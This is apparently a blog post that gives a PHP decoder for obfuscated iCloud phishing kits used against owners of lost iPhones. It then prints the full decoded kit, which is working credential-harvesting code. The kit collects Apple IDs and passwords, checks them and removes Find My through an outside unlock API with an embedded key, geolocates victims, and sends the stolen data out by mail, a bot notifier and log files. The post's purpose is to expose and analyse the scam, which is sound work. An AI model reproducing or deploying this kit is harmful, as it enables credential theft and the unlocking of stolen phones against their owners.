2022-10-27

"iServer/Powered By iSender Team" decoder

When your iPhone is lost, some hackers provide a fake website like Apple and message you on WhatsApp or some social media to reset your password to unlock your iPhone and Disable "find my iPhone".

I checked and decoded some fake website scripts that steal iCloud data from a script and are encoded by a custom PHP encoder called "iServer/Powered By iSender Team". 

decoder:
<?php
/*
 * Script to decrypt files encoded with iServer/Powered By iSender Team
*/

header('Content-type: text/html; charset=utf-8');

// Your encoded file path
$file = '/home/user/file.php';

/**
 * Return string after needle if it exists.
 */
function str_after($str, $needle, $last_occurence = false)
{
    $pos = strpos($str, $needle);

    if ($pos === false) return $str;

    return ($last_occurence === false)
        ? substr($str, $pos + strlen($needle))
        : substr($str, strrpos($str, $needle) + 1);
}

// get file content
$content = file_get_contents($file);

// split the eval section
$eval_code = str_after($content, "eval(");
$eval_code1 = strstr($eval_code, ")))", true);

// get first value
$value1 = str_after($eval_code1, "','"); //gets all text from needle on
$value2 = strstr($value1, "',", true); //gets all text before needle

// get two value
$value3 = str_after($value1, "','"); //gets all text from needle on
$value4 = strstr($value3, "'", true); //gets all text before needle

// decode the file
$myfile = file(str_replace('\\', '/', $file));
$file_ap = array_pop($myfile);
echo (base64_decode(strtr($file_ap, $value2, $value4)));

put your encoded file here:
// Your encoded file path
$file = '/home/user/file.php';

sample encoded file: 
iServer



decoded:
<?php
 $real_ip = real_ip(); $country_ip = ip_info($real_ip, "country"); $city = ip_info($real_ip, "city"); $url = htmlspecialchars($_SERVER["HTTP_REFERER"]); $uri = "#" . $url; $auth = end(explode("=", $url)); $lang = substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2); $IP = real_ip(); $browser = getbrowser(); $os = getos($_SERVER["HTTP_USER_AGENT"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/" . $IP); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip_data_in = curl_exec($ch); curl_close($ch); $ip_data = json_decode($ip_data_in, true); $country = $ip_data["country"]; $city = $ip_data["city"]; $isp = $ip_data["org"]; $code = $ip_data["zip"]; $timezone = $ip_data["timezone"]; $headers.= 'From: iServer' . ""; $subjects = "True Login"; $subject = "False Login"; include "../authid.php"; if (!empty($_POST["appleID"]) && !empty($_POST["pw"])) { $pass = $_POST["pw"]; $pass = str_replace(array("&"), array("+"), $pass); $pass = str_replace(array("#"), array("%23"), $pass); $id = $_POST["appleID"]; include "fml.php"; if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "Users Enter Correct Data.") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>✅ True Login ✅ 😃
		
📱 Link Code' => " . $ID . $auth. $imei. $ref."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $remove = autoremove($_POST["appleID"], $_POST["pw"]); pronot("", "---------📴 Auto Remove Result---------\n$remove\n"); $file = fopen("../prolink/unlocked.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td><td>$remove$myResult</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../prolink/unlockedemail.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../blacklist.txt","a"); fwrite($file, "$IP"); fwrite($file,"\r\n"); fclose($file); mail($to, $subjects, $messBot, $headers, $remove); echo "OK"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == true && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>❌️ False Login ❌️ 😧

📱 Link Code' => " . $ID . $auth. $imei."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $file = fopen("../prolink/failed.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); mail($to, $subject, $messBot, $headers); echo "INVALID"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == true) { $mess = "<p>🔒 User entered locked Apple ID ❌️</p>"; $mess .= "<p></p>"; $mess .= "<p>🔗 Link Code : " . $auth. "</p>"; $mess .= "<p></p>"; $mess .= "<p>🆔 Apple ID : " . $_POST['appleID'] . "</p>"; $mess .= "<p>🔑 Password : " . $_POST["pw"] . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ⌨ Owner System Info     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>📍 IP Address: " . $IP . "</p>"; $mess .= "<p>📱 Browser : " . $browser . "</p>"; $mess .= "<p>🖥 OS : " . $os . "</p>"; $mess .= "<p>🌐 Dev.Lang : " . $lang . "</p>"; $mess .= "<p>🌏 Country : " . $country . "</p>"; $mess .= "<p>🏙 City : " . $city . "</p>"; $mess .= "<p>📫 Postal Code : " . $code . "</p>"; $mess .= "<p>🕛 Time Zone : " . $timezone . "</p>"; $mess .= "<p>⚡ Connection : " . $isp . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ☎️ Contact US     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>🆔 $twitter</p>"; $mess .= "<p>🆔 $telegram</p>"; $mess .= "<p>$copy</p>"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); echo "INVALID"; } } } } function AutoRemove($id, $pass) { $msg = file_get_contents("https://" . $_SERVER["SERVER_NAME"] . "/ickit/ilock.php?id=" . $id . "&pass=" . $pass); $msg = json_decode($msg); $owner_text = $msg->text; $owner_number = $msg->number; $Serial = $msg->newinfo; $myCheck["appleid"] = $id; $myCheck["password"] = $pass; $myCheck["key"] = "6DR-H5K-85D-ASA-FS7-3U8-YCC-MJB"; $myCheck["subscription"] = 1; $myCheck["format"] = "JSON"; $ch = curl_init("https://api.ifreeicloud.co.uk"); curl_setopt($ch, CURLOPT_POSTFIELDS, $myCheck); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $a = json_decode($myResult); $name = $a->name; $count = $a->count; if (0 < $count) { $text = "👤 Name: $name\n\n📱 Total Devices: $count\n\n🔠 Message: $owner_text\n🔢 Lost Mode Number: $owner_number\n\n"; $devices = $a->devices; foreach($devices as $device){ $aname = $device->name; $model = $device->model; $mode = $device->mode; $status = $device->status; $unlocked = $device->unlocked; if($unlocked){ $unlocked = 'Removed 📴 ✅'; } else { $unlocked = 'Unlock Failed 📶 ⛔'; } $text.= "Device Name: $aname\nDevice Model: $model\nDevice Mode: $mode\n$status+$unlocked\n\n"; } $Serials = "--★--Powered By iSender Team--★--\n\n" . $Serial . "\n\n"; return $text . $Serials; } else { return "This Apple ID no have devices."; } } else { return "INVALID"; } } function getOS($user_agent) { $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } function getBrowser() { $agent = $_SERVER["HTTP_USER_AGENT"]; $name = "NA"; if (preg_match("/MSIE/i", $agent) && !preg_match("/Opera/i", $agent)) { $name = "Internet Explorer"; } else { if (preg_match("/Firefox/i", $agent)) { $name = "Mozilla Firefox"; } else { if (preg_match("/Chrome/i", $agent)) { $name = "Google Chrome"; } else { if (preg_match("/Safari/i", $agent)) { $name = "Apple Safari"; } else { if (preg_match("/Opera/i", $agent)) { $name = "Opera"; } else { if (preg_match("/Netscape/i", $agent)) { $name = "Netscape"; } } } } } } return $name; } function real_ip() { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (isset($_SERVER["HTTP_X_REAL_IP"])) { return $_SERVER["HTTP_X_REAL_IP"]; } return $_SERVER["REMOTE_ADDR"]; } function ip_info($ip = NULL, $purpose = "location", $deep_detect = true) { $output = NULL; if (filter_var($ip, FILTER_VALIDATE_IP) === false) { $ip = $_SERVER["REMOTE_ADDR"]; if ($deep_detect) { if (filter_var($_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (filter_var($_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } } } $purpose = str_replace(array("name", "\n", "\t", " ", "-", "_"), NULL, strtolower(trim($purpose))); $support = array("country", "countrycode", "state", "region", "city", "location", "address"); $continents = array("AF" => "Africa", "AN" => "Antarctica", "AS" => "Asia", "EU" => "Europe", "OC" => "Australia (Oceania)", "NA" => "North America", "SA" => "South America"); if (filter_var($ip, FILTER_VALIDATE_IP) && in_array($purpose, $support)) { $ipdat = @json_decode(@file_get_contents("http://ip-api.com/json/" . $ip)); if (@strlen(@trim($ipdat->countryCode)) == 2) { switch ($purpose) { case "location": $output = array("city" => $ipdat->city, "state" => $ipdat->regionName, "country" => $ipdat->country, "country_code" => $ipdat->countryCode); break; case "address": $address = array($ipdat->countryName); if (1 <= @strlen($ipdat->regionName)) { $address[] = $ipdat->regionName; } if (1 <= @strlen($ipdat->city)) { $address[] = $ipdat->city; } $output = implode(", ", array_reverse($address)); break; case "city": $output = $ipdat->city; break; case "state": $output = $ipdat->regionName; break; case "region": $output = $ipdat->regionName; break; case "country": $output = $ipdat->country; break; case "countrycode": $output = $ipdat->countryCode; break; } } return $output; } return $output; } ?>